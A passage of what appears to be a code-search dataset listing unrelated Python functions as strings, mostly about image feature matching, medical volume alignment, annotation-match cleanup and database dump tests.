record.get(key_to_track)\r\n for key_to_track in self.key_matcher.keys()}\r\n self.key_matcher.add(obj=record,\r\n match_dict=match_dict)", "def matches(self, target):\n raise NotImplementedError()", "def MatchMatrixs (self,Node1,Node2):\n\n T1Native_Node = Node1\n T1Native_Matrix = slicer.util.arrayFromVolume(T1Native_Node)\n DimN = T1Native_Matrix.shape\n T1Enhanced_Node = Node2\n T1Enhanced_Matrix = slicer.util.arrayFromVolume(T1Enhanced_Node)\n DimE = T1Enhanced_Matrix.shape\n\n NMatrix = self.GetIJKToRASnpArray(T1Native_Node)\n NVector = NMatrix[:-1,-1]\n EMatrix = self.GetIJKToRASnpArray(T1Enhanced_Node)\n EVector = EMatrix[:-1,-1]\n NPixelSize = [np.linalg.norm(NMatrix[:-1,0]), np.linalg.norm(NMatrix[:-1,1])]\n EPixelSize = [np.linalg.norm(EMatrix[:-1,0]), np.linalg.norm(EMatrix[:-1,1])]\n\n Niversor = NMatrix[:-1,0]/NPixelSize[0]\n Njversor = NMatrix[:-1,1]/NPixelSize[1]\n Nkversor = np.round(np.cross(Niversor,Njversor),3)\n Nkstep = round(np.linalg.norm(NMatrix[:-1,2]),3)\n\n Eiversor = EMatrix[:-1,0]/EPixelSize[0]\n Ejversor = EMatrix[:-1,1]/EPixelSize[1]\n Ekversor = np.round(np.cross(Eiversor,Ejversor),3)\n Ekstep = round(np.linalg.norm(EMatrix[:-1,2]),3)\n print(Nkversor,Ekversor,Nkstep,Ekstep,NVector,EVector,(NVector-EVector).dot(Ekversor))\n if not ( np.sum(Nkversor==Ekversor) == 3 and Nkstep==Ekstep and ((NVector-EVector).dot(Ekversor)) == 0 ): # it verifies if the slices are oriented in the same direction, with the same step between slices and if the first images are complanar.\n slicer.util.warningDisplay('The geometry of the LL Native and LL Enhanced volume doesn\\'t match. 
It could deteriorate the ECV map', windowTitle= 'Warning')\n\n if (DimE == DimN):\n T1_ECVMappingLogic.setupNodeFromNode(self,self.ECVMapNode , self.NativeT1_Selector.currentNode()) \n return [T1Native_Matrix,T1Enhanced_Matrix]\n if (DimE[1:3] == DimN[1:3]):\n k = min([DimE[1],DimN[1]])\n T1_ECVMappingLogic.setupNodeFromNode(self,self.ECVMapNode , self.NativeT1_Selector.currentNode())\n return [T1Native_Matrix[:k,:,:],T1Enhanced_Matrix[:k,:,:]]\n\n jN = np.arange(0,DimN[2]*NPixelSize[1],NPixelSize[1])+NPixelSize[1]/2+(NVector-EVector).dot(Njversor)\n iN = np.arange(0,DimN[1]*NPixelSize[0],NPixelSize[0])+NPixelSize[0]/2+(NVector-EVector).dot(Niversor)\n iE = np.arange(0,DimE[1]*EPixelSize[0],EPixelSize[0])+EPixelSize[0]/2\n jE = np.arange(0,DimE[2]*EPixelSize[1],EPixelSize[1])+EPixelSize[1]/2 \n if DimE[1] > DimN[1]: ## I concidered a square image\n T1Nreshaped = np.zeros(DimE)\n for k in range(DimN[0]):\n f = interpolate.interp2d(iN, jN, np.nan_to_num(T1Native_Matrix[k,:,:]), fill_value = 0)\n T1Nreshaped[k,:,:] = f(iE, jE)\n T1Ereshaped = T1Enhanced_Matrix[:k+1,:,:]\n T1_ECVMappingLogic.setupNodeFromNode(self,self.ECVMapNode , self.EnhancedT1_Selector.currentNode())\n return [T1Nreshaped,T1Ereshaped]\n else:\n T1Ereshaped = np.zeros(DimN)\n for k in range(DimE[0]):\n f = interpolate.interp2d(iE, jE, np.nan_to_num(T1Enhanced_Matrix[k,:,:]), fill_value = 0)\n T1Ereshaped[k,:,:] = f(iN, jN) \n T1Nreshaped = T1Native_Matrix[:k+1,:,:]\n T1_ECVMappingLogic.setupNodeFromNode(self,self.ECVMapNode , self.NativeT1_Selector.currentNode()) \n return [T1Nreshaped,T1Ereshaped]", "def matches(self, accession):\n pass", "def vsone_feature_matching(kpts1, vecs1, kpts2, vecs2, dlen_sqrd2, cfgdict={},\n flann1=None, flann2=None, verbose=None):\n import vtool as vt\n import pyflann\n from vtool import spatial_verification as sver\n #import vtool as vt\n sver_xy_thresh = cfgdict.get('sver_xy_thresh', .01)\n ratio_thresh = cfgdict.get('ratio_thresh', .625)\n refine_method = cfgdict.get('refine_method', 'homog')\n symmetric = cfgdict.get('symmetric', False)\n K = cfgdict.get('K', 1)\n Knorm = cfgdict.get('Knorm', 1)\n #ratio_thresh = .99\n # GET NEAREST NEIGHBORS\n checks = 800\n #pseudo_max_dist_sqrd = (np.sqrt(2) * 512) ** 2\n #pseudo_max_dist_sqrd = 2 * (512 ** 2)\n if verbose is None:\n verbose = True\n\n flann_params = {'algorithm': 'kdtree', 'trees': 8}\n if flann1 is None:\n flann1 = vt.flann_cache(vecs1, flann_params=flann_params, verbose=verbose)\n\n #print('symmetric = %r' % (symmetric,))\n if symmetric:\n if flann2 is None:\n flann2 = vt.flann_cache(vecs2, flann_params=flann_params, verbose=verbose)\n\n try:\n try:\n num_neighbors = K + Knorm\n fx2_to_fx1, fx2_to_dist = normalized_nearest_neighbors(flann1, vecs2, num_neighbors, checks)\n #fx2_to_fx1, _fx2_to_dist = flann1.nn_index(vecs2, num_neighbors=K, checks=checks)\n if symmetric:\n fx1_to_fx2, fx1_to_dist = normalized_nearest_neighbors(flann2, vecs1, K, checks)\n\n except pyflann.FLANNException:\n print('vecs1.shape = %r' % (vecs1.shape,))\n print('vecs2.shape = %r' % (vecs2.shape,))\n print('vecs1.dtype = %r' % (vecs1.dtype,))\n print('vecs2.dtype = %r' % (vecs2.dtype,))\n raise\n if symmetric:\n is_symmetric = flag_symmetric_matches(fx2_to_fx1, fx1_to_fx2)\n fx2_to_fx1 = fx2_to_fx1.compress(is_symmetric, axis=0)\n fx2_to_dist = fx2_to_dist.compress(is_symmetric, axis=0)\n\n assigntup = assign_unconstrained_matches(fx2_to_fx1, fx2_to_dist)\n\n fx2_match, fx1_match, fx1_norm, match_dist, norm_dist = assigntup\n fm_ORIG = np.vstack((fx1_match, 
fx2_match)).T\n fs_ORIG = 1 - np.divide(match_dist, norm_dist)\n # APPLY RATIO TEST\n fm_RAT, fs_RAT, fm_norm_RAT = ratio_test(fx2_match, fx1_match, fx1_norm,\n match_dist, norm_dist,\n ratio_thresh)\n\n # SPATIAL VERIFICATION FILTER\n #with ut.EmbedOnException():\n match_weights = np.ones(len(fm_RAT))\n svtup = sver.spatially_verify_kpts(kpts1, kpts2, fm_RAT, sver_xy_thresh,\n dlen_sqrd2, match_weights=match_weights,\n refine_method=refine_method)\n if svtup is not None:\n (homog_inliers, homog_errors, H_RAT) = svtup[0:3]\n else:\n H_RAT = np.eye(3)\n homog_inliers = []\n fm_RAT_SV = fm_RAT.take(homog_inliers, axis=0)\n fs_RAT_SV = fs_RAT.take(homog_inliers, axis=0)\n fm_norm_RAT_SV = fm_norm_RAT[homog_inliers]\n\n top_percent = .5\n top_idx = ut.take_percentile(fx2_to_dist.T[0].argsort(), top_percent)\n fm_TOP = fm_ORIG.take(top_idx, axis=0)\n fs_TOP = fx2_to_dist.T[0].take(top_idx)\n #match_weights = np.ones(len(fm_TOP))\n #match_weights = (np.exp(fs_TOP) / np.sqrt(np.pi * 2))\n match_weights = 1 - fs_TOP\n #match_weights = np.ones(len(fm_TOP))\n svtup = sver.spatially_verify_kpts(kpts1, kpts2, fm_TOP, sver_xy_thresh,\n dlen_sqrd2, match_weights=match_weights,\n refine_method=refine_method)\n if svtup is not None:\n (homog_inliers, homog_errors, H_TOP) = svtup[0:3]\n np.sqrt(homog_errors[0] / dlen_sqrd2)\n else:\n H_TOP = np.eye(3)\n homog_inliers = []\n fm_TOP_SV = fm_TOP.take(homog_inliers, axis=0)\n fs_TOP_SV = fs_TOP.take(homog_inliers, axis=0)\n\n matches = {\n 'ORIG' : MatchTup2(fm_ORIG, fs_ORIG),\n 'RAT' : MatchTup3(fm_RAT, fs_RAT, fm_norm_RAT),\n 'RAT+SV' : MatchTup3(fm_RAT_SV, fs_RAT_SV, fm_norm_RAT_SV),\n 'TOP' : MatchTup2(fm_TOP, fs_TOP),\n 'TOP+SV' : MatchTup2(fm_TOP_SV, fs_TOP_SV),\n }\n output_metdata = {\n 'H_RAT': H_RAT,\n 'H_TOP': H_TOP,\n }\n\n except MatchingError:\n fm_ERR = np.empty((0, 2), dtype=np.int32)\n fs_ERR = np.empty((0, 1), dtype=np.float32)\n H_ERR = np.eye(3)\n matches = {\n 'ORIG' : MatchTup2(fm_ERR, fs_ERR),\n 'RAT' : MatchTup3(fm_ERR, fs_ERR, fm_ERR),\n 'RAT+SV' : MatchTup3(fm_ERR, fs_ERR, fm_ERR),\n 'TOP' : MatchTup2(fm_ERR, fs_ERR),\n 'TOP+SV' : MatchTup2(fm_ERR, fs_ERR),\n }\n output_metdata = {\n 'H_RAT': H_ERR,\n 'H_TOP': H_ERR,\n }\n\n return matches, output_metdata", "def try1():\n path = '/Users/mayankkejriwal/datasets/eswc2017/disasters/'\n model = Word2Vec.load_word2vec_format(path+'GoogleNews-vectors-negative300.bin', binary=True)\n model.init_sims(replace=True)\n keys = ['charlotte', 'Charlotte', 'yorktown', 'LA']\n for key in keys:\n try:\n # print model.most_similar(positive=['woman', 'king'], negative=['man'])\n j = model[key]\n print 'found...',\n print key\n except KeyError:\n print 'not found...',\n print key\n continue\n print model.similarity('charlotte', 'carolina')\n print model.similarity('LA', 'California')", "def hit(self):", "def test_two_referrers(dumper, db):\n dumper.reader.load_db(\n db.create_sample(\n 5,\n fkeys=[\n (\"table1\", \"t2id\", \"table2\", \"id\"),\n (\"table1\", \"t3id\", \"table3\", \"id\"),\n (\"table2\", \"t24id\", \"table4\", \"id\"),\n (\"table3\", \"t34id\", \"table4\", \"id\"),\n ],\n )\n )\n dumper.add_config({\"db_objects\": [{\"name\": \"table1\"}]})\n dumper.perform_dump()\n objs = [obj for obj, match in dumper.writer.dumped if isinstance(obj, Table)]\n assert len(objs) == 4\n\n (match,) = [match for obj, match in dumper.writer.dumped if obj.name == \"table4\"]\n assert len(match.referenced_by) == 2\n assert sorted(fkey.name for fkey in match.referenced_by) == [\n \"t24id_table4_id_fkey\",\n 
\"t34id_table4_id_fkey\",\n ]", "def test_fkey_nav_rec(dumper, db):\n dumper.reader.load_db(\n db.create_sample(\n 4,\n fkeys=[\n (\"table1\", \"t2id\", \"table2\", \"id\"),\n (\"table2\", \"t3id\", \"table3\", \"id\"),\n ],\n )\n )\n dumper.add_config({\"db_objects\": [{\"name\": \"table1\"}]})\n dumper.perform_dump()\n objs = [obj for obj, match in dumper.writer.dumped if isinstance(obj, Table)]\n assert len(objs) == 3", "def fit(self):\n\n self.bow_archives_by_paperid = {userid: [self.dictionary.doc2bow(doc) for doc in archive] \\\n for userid, archive in self.kp_archives_by_paperid.items()}\n\n self.bow_archives_by_userid = {userid: [self.dictionary.doc2bow(doc) for doc in archive] \\\n for userid, archive in self.kp_archives_by_userid.items()}\n\n flattened_archives = [\n bow for archive in self.bow_archives_by_paperid.values() for bow in archive]\n\n self.index = SparseMatrixSimilarity(\n [self.tfidf[bow] for bow in flattened_archives],\n num_features=len(self.dictionary)\n )", "def test_desy_keyword_translation(self):\n spi_search = \"find dk \\\"B --> pi pi\\\"\"\n inv_search = \"695__a:\\\"B --> pi pi\\\"\"\n self._compare_searches(inv_search, spi_search)", "def match(desc1,desc2):\n desc1 = array([d/linalg.norm(d) for d in desc1])\n desc2 = array([d/linalg.norm(d) for d in desc2])\n dist_ratio = 0.6\n desc1_size = desc1.shape\n matchscores = zeros((desc1_size[0],1),'int')\n desc2t = desc2.T # precompute matrix transpose\n for i in range(desc1_size[0]):\n dotprods = dot(desc1[i, :], desc2t) # vector of dot products\n dotprods *= 0.9999\n # inverse cosine and sort, return index for features in second image\n indx = argsort(arccos(dotprods))\n # check if nearest neighbor has angle less than dist_ratio times 2nd\n if arccos(dotprods)[indx[0]] < dist_ratio * arccos(dotprods)[indx[1]]:\n matchscores[i] = int(indx[0])\n return matchscores", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. 
for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict", "def match(desc1,desc2):\n\t\n\tdesc1 = array([d/linalg.norm(d) for d in desc1])\n\tdesc2 = array([d/linalg.norm(d) for d in desc2])\n\t\n\tdist_ratio = 0.6\n\tdesc1_size = desc1.shape\n\t\n\tmatchscores = zeros((desc1_size[0],1))\n\tdesc2t = desc2.T #precompute matrix transpose\n\tfor i in range(desc1_size[0]):\n\t\tdotprods = dot(desc1[i,:],desc2t) #vector of dot products\n\t\tdotprods = 0.9999*dotprods\n\t\t#inverse cosine and sort, return index for features in second image\n\t\tindx = argsort(arccos(dotprods))\n\t\t\n\t\t#check if nearest neighbor has angle less than dist_ratio times 2nd\n#\t\tif arccos(dotprods)[indx[0]] < dist_ratio * arccos(dotprods)[indx[1]]:\n\t\tmatchscores[i] = int(indx[0])\n\t\n\treturn matchscores", "def pg_secondary_keys(self):", "def key_ik(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n 
tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n if not pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_ik(robot)\n\n ik_attributes = ['ik',\n 'v',\n 'ikSolution1',\n 'ikSolution2',\n 'ikSolution3']\n\n # Key all IK elements\n for attr in ik_attributes:\n pm.setKeyframe(target_ctrl_path, attribute=attr)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n fk_pose = find_fk_config(robot)\n\n # Key all FK elements\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY',\n value=fk_pose[0])\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[1])\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[2])\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ',\n value=fk_pose[3])\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[4])\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ',\n value=fk_pose[5])\n\n # Key visibility of FK controllers\n pm.setKeyframe(fk_ctrls_path, attribute='visibility')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')", "def refseq_based_clustering(self):\n self.refseq_based = Usefuls.NonRedSet.NonRedSetDict()\n for prey in self.ivv_info.Prey_info().preys():\n refseqid = self.get_refseq(prey)\n if refseqid:\n self.refseq_based.append_Dict(refseqid, prey)", "def edge_mapping(self):\n ...", "def testFindCorrespondence(self):\n # Create some dummy keypoints and descriptors to match. 
Make the descriptors really far apart to be sure.\n keypoints1 = []\n descriptors1 = numpy.zeros(shape=(3, 1))\n keypoint = cv2.KeyPoint()\n for i in range(3):\n keypoint.pt = (float(i), 0.0)\n keypoints1.append(keypoint)\n descriptors1[i] = i*100.0\n keypoints2 = []\n descriptors2 = numpy.zeros(shape=(5, 1))\n for i in range(5):\n keypoint.pt = (0.0, float(i))\n keypoints2.append(keypoint)\n descriptors2[i] = i*105.0\n (first_points, second_points) = self.evaluator._findCorrespondence(\n keypoints1, descriptors1, keypoints2, descriptors2)\n expected_first = numpy.array([[0.0, 0.0], [1.0, 0.0], [2.0, 0.0]])\n expected_second = numpy.array([[0.0, 0.0], [0.0, 1.0], [0.0, 2.0]])\n self.assertTrue(numpy.array_equal(first_points, expected_first))\n self.assertTrue(numpy.array_equal(second_points, expected_second))", "def illustrate_matching(self):\n work_dir = self.work_dir\n draw_keys_oriented(work_dir+'matching_keys_im0.txt',\n work_dir+'input_0.orig.png',\n work_dir+'matching_keys_im0.png')\n draw_keys_oriented(work_dir+'matching_keys_im1.txt',\n work_dir+'input_1.orig.png',\n work_dir+'matching_keys_im1.png')\n draw_matches(work_dir+'matches.txt',\n work_dir+'input_0.orig.png',\n work_dir+'input_1.orig.png',\n work_dir+'OUTmatches.png')\n return 1", "def look_for_reference_image(image):\n match_list = []\n thresh = 8\n final_value = -1\n references = import_reference_images()\n # Initialize the ORB detector algorithm\n orb = cv2.ORB_create()\n\n # Now detect the keypoints and compute\n # the descriptors for the query image\n imgKeypoints, imgDescriptors = orb.detectAndCompute(image, None)\n try:\n for ref in references:\n # Now detect the keypoints and compute\n # the descriptors for the train image\n ref.refKeypoints, ref.refDescriptors = orb.detectAndCompute(ref.img, None)\n\n # Initialize the Matcher for matching\n # the keypoints and then match the\n # keypoints\n matcher = cv2.BFMatcher()\n matches = matcher.knnMatch(imgDescriptors, ref.refDescriptors, k=2)\n\n for m, n in matches:\n if m.distance < 0.75 * n.distance:\n ref.refMatches.append([m])\n\n match_list.append(len(ref.refMatches))\n except:\n pass\n if len(match_list) != 0:\n if max(match_list) > thresh:\n final_value = match_list.index(max(match_list))\n\n return references[final_value].name", "def test5(self):\n tgts = [ ('CCC(O)C(=O)O',\n ('O[CH-][CH2-]','O[CH-][C-]=O')),\n ]\n for smi,matches in tgts:\n m = Chem.MolFromSmiles(smi)\n fp1 = Chem.RDKFingerprint(m,2,7,9192,4,1)\n obs = fp1.GetOnBits()\n for match in matches:\n m2 = Chem.MolFromSmiles(match)\n fp2 = Chem.RDKFingerprint(m2,2,7,9192,4,1)\n v1,v2 = DataStructs.OnBitProjSimilarity(fp2,fp1)\n assert feq(v1,1.0000),'substruct %s not properly contained in %s'%(match,smi)", "def test_post_chain_search(self):\n pass", "def object_detection(self):\r\n pass", "def test_normal_fields_can_be_defined_between_primary_keys(self):", "def similarity(self, e1, e2):\n\t\tpass", "def find(image):\n keypoint, description = describe(image)\n # load keypoints, descriptions from mongodb\n\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n\n best_match_size = float(\"inf\")\n best_match_index = -1\n match_index = 0\n best_matches = 0\n\n for desc in descriptions:\n matches = bf.match(desc,description)\n matches = sorted(matches, key = lambda x:x.distance)\n if len(matches) > 0:\n match_size = sum(x.distance for x in matches[:10])\n\n print \"match size is \", match_size\n if match_size < best_match_size:\n best_match_size = match_size\n best_match_index = match_index\n 
best_matches = matches\n\n match_index += 1\n\n needle_color = cv2.imread('needle-stripped.png')[:,:,::-1] # needle\n best_match_image = cv2.imread(\"haystack/\"+files[best_match_index])\n print \"best match is \", files[best_match_index]\n\n # Draw first 10 matches.\n outImg = cv2.imread(\"output/outImg.png\")\n match = cv2.drawMatches(needle_color,keypoint,best_match_image[:,:,::-1],keypoints[best_match_index],best_matches[-20:],outImg, flags=6)\n\n plt.imshow(match),plt.show()\n return", "def _fit_exact_match(self):\n entity_map = self._resource_loader.get_entity_map(self.type)\n self._exact_match_mapping = self._process_entity_map(\n self.type, entity_map, self._normalizer\n )", "def matches(self, feature):\n pass", "def fix_annotmatch_pzmaster1():\n import wbia\n\n ibs = wbia.opendb('PZ_Master1')\n infr = wbia.AnnotInference(ibs=ibs, aids=ibs.get_valid_aids(), verbose=5)\n infr.initialize_graph()\n annots = ibs.annots()\n aid_to_nid = ut.dzip(annots.aids, annots.nids)\n\n if False:\n infr.reset_feedback()\n infr.ensure_mst()\n infr.apply_feedback_edges()\n infr.relabel_using_reviews()\n infr.start_qt_interface()\n\n # Get annotmatch rowids that agree with current labeling\n if False:\n annotmatch = ibs.db.get_table_as_pandas('annotmatch')\n import pandas as pd\n\n flags1 = pd.isnull(annotmatch['annotmatch_evidence_decision'])\n flags2 = annotmatch['annotmatch_tag_text'] == ''\n bad_part = annotmatch[flags1 & flags2]\n rowids = bad_part.index.tolist()\n ibs.delete_annotmatch(rowids)\n\n if False:\n # Delete bidirectional annotmatches\n annotmatch = ibs.db.get_table_as_pandas('annotmatch')\n df = annotmatch.set_index(['annot_rowid1', 'annot_rowid2'])\n\n # Find entires that have both directions\n pairs1 = annotmatch[['annot_rowid1', 'annot_rowid2']].values\n f_edges = {tuple(p) for p in pairs1}\n b_edges = {tuple(p[::-1]) for p in pairs1}\n isect_edges = {tuple(sorted(p)) for p in b_edges.intersection(f_edges)}\n isect_edges1 = list(isect_edges)\n isect_edges2 = [p[::-1] for p in isect_edges]\n\n # cols = ['annotmatch_evidence_decision', 'annotmatch_tag_text']\n import pandas as pd\n\n custom_ = {\n (559, 4909): (False, ['photobomb']),\n (7918, 8041): (False, ['photobomb']),\n (6634, 6754): (False, ['photobomb']),\n (3707, 3727): (False, ['photobomb']),\n (86, 103): (False, ['photobomb']),\n }\n extra_ = {}\n\n fixme_edges = []\n\n d1 = df.loc[isect_edges1].reset_index(drop=False)\n d2 = df.loc[isect_edges2].reset_index(drop=False)\n flags = d1['annotmatch_evidence_decision'] != d2['annotmatch_evidence_decision']\n from wbia.tag_funcs import _parse_tags\n\n for f, r1, r2 in zip(flags, d1.iterrows(), d2.iterrows()):\n v1, v2 = r1[1], r2[1]\n aid1 = v1['annot_rowid1']\n aid2 = v1['annot_rowid2']\n truth_real = (\n ibs.const.EVIDENCE_DECISION.POSITIVE\n if aid_to_nid[aid1] == aid_to_nid[aid2]\n else ibs.const.EVIDENCE_DECISION.NEGATIVE\n )\n truth1 = v1['annotmatch_evidence_decision']\n truth2 = v2['annotmatch_evidence_decision']\n t1 = _parse_tags(v1['annotmatch_tag_text'])\n t2 = _parse_tags(v2['annotmatch_tag_text'])\n newtag = ut.union_ordered(t1, t2)\n if (aid1, aid2) in custom_:\n continue\n fixme_flag = False\n if not pd.isnull(truth1):\n if truth_real != truth1:\n fixme_flag = True\n if not pd.isnull(truth2):\n if truth_real != truth2:\n fixme_flag = True\n if fixme_flag:\n logger.info('newtag = {!r}'.format(newtag))\n logger.info('truth_real = {!r}'.format(truth_real))\n logger.info('truth1 = {!r}'.format(truth1))\n logger.info('truth2 = {!r}'.format(truth2))\n logger.info('aid1 = 
{!r}'.format(aid1))\n logger.info('aid2 = {!r}'.format(aid2))\n fixme_edges.append((aid1, aid2))\n else:\n extra_[(aid1, aid2)] = (truth_real, newtag)\n\n extra_.update(custom_)\n new_pairs = extra_.keys()\n new_truths = ut.take_column(ut.dict_take(extra_, new_pairs), 0)\n new_tags = ut.take_column(ut.dict_take(extra_, new_pairs), 1)\n new_tag_texts = [';'.join(t) for t in new_tags]\n aids1, aids2 = ut.listT(new_pairs)\n\n # Delete the old\n ibs.delete_annotmatch(\n d1['annotmatch_rowid'].values.tolist()\n + d2['annotmatch_rowid'].values.tolist()\n )\n\n # Add the new\n ams = ibs.add_annotmatch_undirected(aids1, aids2)\n ibs.set_annotmatch_evidence_decision(ams, new_truths)\n ibs.set_annotmatch_tag_text(ams, new_tag_texts)\n\n if False:\n import wbia.guitool as gt\n\n gt.ensure_qapp()\n ut.qtensure()\n from wbia.gui import inspect_gui\n\n inspect_gui.show_vsone_tuner(ibs, aid1, aid2)\n\n # pairs2 = pairs1.T[::-1].T\n # idx1, idx2 = ut.isect_indices(list(map(tuple, pairs1)),\n # list(map(tuple, pairs2)))\n # r_edges = list(set(map(tuple, map(sorted, pairs1[idx1]))))\n # unique_pairs = list(set(map(tuple, map(sorted, pairs1[idx1]))))\n # df = annotmatch.set_index(['annot_rowid1', 'annot_rowid2'])\n\n x = ut.ddict(list)\n annotmatch = ibs.db.get_table_as_pandas('annotmatch')\n import ubelt as ub\n\n _iter = annotmatch.iterrows()\n prog = ub.ProgIter(_iter, length=len(annotmatch))\n for k, m in prog:\n aid1 = m['annot_rowid1']\n aid2 = m['annot_rowid2']\n if m['annotmatch_evidence_decision'] == ibs.const.EVIDENCE_DECISION.POSITIVE:\n if aid_to_nid[aid1] == aid_to_nid[aid2]:\n x['agree1'].append(k)\n else:\n x['disagree1'].append(k)\n elif m['annotmatch_evidence_decision'] == ibs.const.EVIDENCE_DECISION.NEGATIVE:\n if aid_to_nid[aid1] == aid_to_nid[aid2]:\n x['disagree2'].append(k)\n else:\n x['agree2'].append(k)\n\n ub.map_vals(len, x)\n ut.dict_hist(annotmatch.loc[x['disagree1']]['annotmatch_tag_text'])\n\n disagree1 = annotmatch.loc[x['disagree1']]\n pb_disagree1 = disagree1[disagree1['annotmatch_tag_text'] == 'photobomb']\n aids1 = pb_disagree1['annot_rowid1'].values.tolist()\n aids2 = pb_disagree1['annot_rowid2'].values.tolist()\n aid_pairs = list(zip(aids1, aids2))\n infr = wbia.AnnotInference.from_pairs(aid_pairs, ibs=ibs, verbose=5)\n if False:\n feedback = infr.read_wbia_annotmatch_feedback(edges=infr.edges())\n infr.external_feedback = feedback\n infr.apply_feedback_edges()\n infr.start_qt_interface(loop=False)\n\n # Delete these values\n if False:\n nonpb_disagree1 = disagree1[disagree1['annotmatch_tag_text'] != 'photobomb']\n disagree2 = annotmatch.loc[x['disagree2']]\n ibs.delete_annotmatch(nonpb_disagree1['annotmatch_rowid'])\n ibs.delete_annotmatch(disagree2['annotmatch_rowid'])\n\n # ut.dict_hist(disagree1['annotmatch_tag_text'])\n import networkx as nx\n\n graph = nx.Graph()\n graph.add_edges_from(zip(pb_disagree1['annot_rowid1'], pb_disagree1['annot_rowid2']))\n list(nx.connected_components(graph))\n\n set(annotmatch.loc[x['disagree2']]['annotmatch_tag_text'])\n\n # aid1, aid2 = 2585, 1875\n # # pd.unique(annotmatch['annotmatch_evidence_decision'])\n # from wbia.gui import inspect_gui\n # inspect_gui.show_vsone_tuner(ibs, aid1, aid2)\n # from vtool import inspect_matches\n\n # aid1, aid2 = 2108, 2040\n\n # pd.unique(annotmatch['annotmatch_tag_text'])\n\n # infr.reset_feedback()\n # infr.relabel_using_reviews()", "def test_labels_match_geographies(self):\n geo = self.geographies.find_one({ 'geoid': '15' })\n labels = self.labels.find_one({ 'dataset': 'SF1' })\n\n geo_tables = 
geo['data']['2010']\n labels_tables = labels['tables']\n\n self.assertEqual(sorted(geo_tables.keys()), sorted(labels_tables.keys()))\n\n # Test table has labels\n for table_name, geo_keys in geo_tables.items():\n label_keys = labels_tables[table_name]['labels']\n\n self.assertEqual(sorted(geo_keys.keys()), sorted(label_keys.keys()))\n\n for table_name, label_data in labels_tables.items():\n label_keys = label_data['labels']\n geo_keys = geo_tables[table_name]\n\n self.assertEqual(sorted(geo_keys.keys()), sorted(label_keys.keys()))", "def refseq_based_clustering(self):\n self.refseq_based = NonRedSetDict()\n for prey in self.ivv_info.Prey_info().preys():\n refseqid = self.get_refseq(prey)\n if refseqid:\n self.refseq_based.append_Dict(refseqid, prey)", "def _attentive_matching(self, h1, h2, cosine_matrix, w):\n # h1 * weights, (batch_size, h1_timesteps, mp_dim, embedding_size)\n h1 = self._time_distributed_multiply(h1, w)\n # attentive vector (batch_size, h1_timesteps, embedding_szie)\n attentive_vec = self._mean_attentive_vectors(h2, cosine_matrix)\n # attentive_vec * weights, (batch_size, h1_timesteps, mp_dim, embedding_size)\n attentive_vec = 